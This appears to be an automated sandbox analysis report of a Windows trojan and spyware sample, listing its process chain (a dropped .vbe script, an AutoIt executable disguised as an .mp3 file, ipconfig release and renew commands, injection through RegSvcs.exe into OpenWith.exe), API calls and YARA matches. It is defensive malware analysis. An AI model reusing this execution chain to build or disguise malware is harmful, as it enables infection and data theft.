Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E29ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 16_2_00E29ED5
Source: Yara match File source: 15.3.OpenWith.exe.59c0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.3.OpenWith.exe.57a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 7980, type: MEMORYSTR

System Summary

barindex
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA41B GetCurrentProcess,NtQueryInformationProcess, 17_2_066CA41B
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C7895 NtQueryInformationProcess, 17_2_066C7895
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B09B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00B09B5C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_003D1A91
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 7_2_003DF122
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 16_2_00DFF122
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1355D 0_2_00B1355D
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1B76F 0_2_00B1B76F
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0BF3D 0_2_00B0BF3D
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2C0D6 0_2_00B2C0D6
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1A008 0_2_00B1A008
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B292D0 0_2_00B292D0
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1A222 0_2_00B1A222
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B15214 0_2_00B15214
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1C27F 0_2_00B1C27F
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B34360 0_2_00B34360
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B386D2 0_2_00B386D2
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B146CF 0_2_00B146CF
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B048AA 0_2_00B048AA
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B3480E 0_2_00B3480E
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B05AFE 0_2_00B05AFE
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1ABC8 0_2_00B1ABC8
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B07CBA 0_2_00B07CBA
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1BC05 0_2_00B1BC05
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B03D9D 0_2_00B03D9D
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B14D32 0_2_00B14D32
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2BEA7 0_2_00B2BEA7
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B05F39 0_2_00B05F39
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B15F0B 0_2_00B15F0B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00398037 7_2_00398037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00392007 7_2_00392007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038E0BE 7_2_0038E0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0037E1A0 7_2_0037E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0037225D 7_2_0037225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003AA28E 7_2_003AA28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003922C2 7_2_003922C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038C59E 7_2_0038C59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003FC7A3 7_2_003FC7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003AE89F 7_2_003AE89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E291A 7_2_003E291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003A6AFB 7_2_003A6AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D8B27 7_2_003D8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0039CE30 7_2_0039CE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003A7169 7_2_003A7169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_004051D2 7_2_004051D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00379240 7_2_00379240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00379499 7_2_00379499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00391724 7_2_00391724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00391A96 7_2_00391A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00379B60 7_2_00379B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00397BAB 7_2_00397BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00391D40 7_2_00391D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00397DDA 7_2_00397DDA
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01358250 14_2_01358250
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01355158 14_2_01355158
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01355148 14_2_01355148
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01358240 14_2_01358240
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01357F2C 14_2_01357F2C
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A48419 15_2_05A48419
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5FC7D 15_2_05A5FC7D
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A4871F 15_2_05A4871F
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5C776 15_2_05A5C776
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5BE5A 15_2_05A5BE5A
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5C1DA 15_2_05A5C1DA
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5E833 15_2_05A5E833
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A57815 15_2_05A57815
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A57BA2 15_2_05A57BA2
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5BBAF 15_2_05A5BBAF
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A52340 15_2_05A52340
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DAE0BE 16_2_00DAE0BE
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB2007 16_2_00DB2007
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB8037 16_2_00DB8037
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D9E1A0 16_2_00D9E1A0
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB22C2 16_2_00DB22C2
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DCA28E 16_2_00DCA28E
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D9225D 16_2_00D9225D
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DAC59E 16_2_00DAC59E
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E1C7A3 16_2_00E1C7A3
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DCE89F 16_2_00DCE89F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0291A 16_2_00E0291A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DC6AFB 16_2_00DC6AFB
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DF8B27 16_2_00DF8B27
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DBCE30 16_2_00DBCE30
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E251D2 16_2_00E251D2
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DC7169 16_2_00DC7169
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D99240 16_2_00D99240
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D99499 16_2_00D99499
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB1724 16_2_00DB1724
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB1A96 16_2_00DB1A96
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB7BAB 16_2_00DB7BAB
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D99B60 16_2_00D99B60
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB7DDA 16_2_00DB7DDA
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB1D40 16_2_00DB1D40
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF8250 17_2_01BF8250
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF5158 17_2_01BF5158
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF5148 17_2_01BF5148
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF8240 17_2_01BF8240
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C3E3D 17_2_066C3E3D
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C7E1D 17_2_066C7E1D
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_06A62E20 17_2_06A62E20
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C9BC4 17_2_066C9BC4
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066D1B8C 17_2_066D1B8C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066D1C22 17_2_066D1C22
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C3000 17_2_066C3000
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: String function: 00390DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: String function: 0038FD60 appears 31 times
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: String function: 00DAFD60 appears 31 times
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: String function: 00DB0DC0 appears 46 times
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: String function: 00B257D8 appears 66 times
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: String function: 00B26630 appears 31 times
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: String function: 00B257A5 appears 34 times
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs ngPebbPhbp.exe
Source: ngPebbPhbp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@31/48@0/1
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0932C GetLastError,FormatMessageW,_wcslen,LocalFree, 0_2_00B0932C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D194F AdjustTokenPrivileges,CloseHandle, 7_2_003D194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 7_2_003D1F53
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DF194F AdjustTokenPrivileges,CloseHandle, 16_2_00DF194F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DF1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 16_2_00DF1F53
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 7_2_003E5B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 7_2_003DDC9C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003F4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 7_2_003F4089
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00B1EBD3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\SysWOW64\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0 Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Command line argument: sfxname 0_2_00B2454A
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Command line argument: sfxstime 0_2_00B2454A
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Command line argument: STARTDLG 0_2_00B2454A
Source: ngPebbPhbp.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ngPebbPhbp.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File read: C:\Users\user\Desktop\ngPebbPhbp.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ngPebbPhbp.exe "C:\Users\user\Desktop\ngPebbPhbp.exe"
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
Source: unknown Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
